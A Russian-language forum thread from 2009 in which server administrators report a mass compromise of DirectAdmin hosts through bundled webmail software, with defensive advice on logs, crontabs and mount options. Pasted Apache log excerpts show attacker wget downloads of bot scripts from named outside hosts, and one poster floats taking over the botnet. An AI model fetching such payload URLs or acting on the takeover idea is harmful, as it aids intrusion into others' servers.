Реклама на сайте Advertise with us

Обнаружена хакерская активность. Формируется большой ботнет

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:

Криптопохуист

С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019

Ссылка на сообщениеДобавлено: 12/02/09 в 16:48       Ответить с цитатойцитата 

В общем ребята подошли к делу серъезно. Ломают все что плохо стоит.

В особом списке - серваки с DirectAdmin.

DirectAdmin по дефолту ставит в /var/www/html следующий софт:
RoundCube
phpmyadmin
Squirrelmail
webmail

И делает алиасы на все домены и дефолтные хосты!!!! Софт абсолютно открытый.

Если вам дорого ваш сервер, при установке директадмина убивайте это гавно.



Если у вас стоит директадмин, зайдите посмотрите в /var/log/httpd/error_log

Признаки взлома:
Код:

[Wed Feb 11 18:40:12 2009] [error] [client 77.241.20.10] File does not exist: /var/www/html/404.shtml, referer: http://1gav.com/681-seks-s-molodenkojj-pukhloj
--18:40:55--  http://www.igotsluts.com/test/dc.pl
Resolving igotsluts.com... 67.55.104.228
Connecting to igotsluts.com|67.55.104.228|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 761 [text/plain]
Saving to: `dc.pl'

     0K                                                       100% 90.7M=0s

18:40:56 (90.7 MB/s) - `dc.pl' saved [761/761]


или такое

Код:
17:37:09 (66.4 KB/s) - `botn7.txt.1' saved [32362/32362]

........ .                    100% 66.3K=0.5ssh: GET: command not found


17:37:09 (66.3 KB/s) - `botn7.txt.2' saved [32362/32362]

sh: GET: command not found

--17:37:11--  http://www.submasters.xpg.com.br/botn7.txt
Resolving submasters.xpg.com.br... 200.149.77.40
Connecting to submasters.xpg.com.br|200.149.77.40|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 32362 (32K) [text/plain]
Saving to: `botn7.txt'

     0K .......... .......... .......... .                    100% 70.5K=0.4s

17:37:12 (70.5 KB/s) - `botn7.txt' saved [32362/32362]

sh: GET: command not found


Ломают через /var и /tmp - ставьте на эти партиции nosuid,noexec!

Именно там можно обнаружить ирк-ботов (исполнительная часть ботнета), ремот шеллы и т.п.

Если не удалось повысить привилегии, ставят в crontab юзера апача свой autorun. Смотрите в кронтаб.


Если стоит ядро 2.6.18-53 - пиздец.
http://www.centos.org/modules/newbb/viewtopic.php?topic_id=12639

повышение привилегий и здравствуй RootKit.

ПС. Взломы были так же обнаружены и без директадмина, но с опенсорсным ПО. Взломы носят массовый однотипный характер, обнаружить их можно в общем error_log Апача.

Последний раз редактировалось: Pentarh (12/02/09 в 17:01), всего редактировалось 1 раз

0
 

www.phpdevs.com

С нами с 24.10.02
Сообщения: 16633
Рейтинг: 16105


Передовик Master-X (01.09.2005) Передовик Master-X (16.09.2005) Передовик Master-X (01.10.2005) Передовик Master-X (16.08.2006) Передовик Master-X (16.10.2006) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 12/02/09 в 16:57       Ответить с цитатойцитата 

А через что ломается, через директадмин ?

Пишу на php/mysql/django за вменяемые деньги.
Обращаться в личку.

0
 

Криптопохуист

С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019

Ссылка на сообщениеДобавлено: 12/02/09 в 17:04       Ответить с цитатойцитата 

Через опенсорс. Просто в дефолтном директадмине идут опенсорсные

RoundCube
phpmyadmin
Squirrelmail
webmail

Доступные из любого домена.

0
 



С нами с 02.09.06
Сообщения: 598
Рейтинг: 613

Ссылка на сообщениеДобавлено: 12/02/09 в 19:05       Ответить с цитатойцитата 

RoundCube сносить надо сразу, через него и ломают. Взломов через пхпадмин, сквирел и вебмейл не обнаруживали пока. Проверить следует /var/tmp/, и крон юзера от которого работает апач. Ломают с 30 декабря, проходят по всем айпишкам датацентров.

0
 

Криптопохуист

С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019

Ссылка на сообщениеДобавлено: 12/02/09 в 23:17       Ответить с цитатойцитата 

Замечу опять же, сломали и те места, где не стоял директадмин с этими раундкубами. Но там стояли другие опенсорсы.

Схема проникновения аналогичная. Аналогично, на машину жертвы ставится IRC-bot с кучей другого говнища.

Из чего можно предположить что составляется массивный ботнет.

С другой стороны, я погуглил по названиям файлов эксплойтов - вышел на какой то бразильский сайт с чемпионатом по хаку smail101.gif

И кстати на взломаных машинах вредоносная деятельность отсутствовала. Даже там где умудрялись впарить руткит.

Может этот мега-ботнет можно как то окучить? У меня куча их исходников со списками юзнета и каналами. Вообще похоже на какую то дорогую, спланированную большую кампанию.

0
 

Криптопохуист

С нами с 05.04.03
Сообщения: 17158
Рейтинг: 6019

Ссылка на сообщениеДобавлено: 12/02/09 в 23:49       Ответить с цитатойцитата 

0
 



С нами с 05.05.07
Сообщения: 497
Рейтинг: 93

Ссылка на сообщениеДобавлено: 15/02/09 в 22:02       Ответить с цитатойцитата 

Уязвимость баянистая уже. Закрыли этот issue еще в самом начале января.

Выделенные серверы и VPS с абсолютно бесплатным администрированием! 14 лет с вами!

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »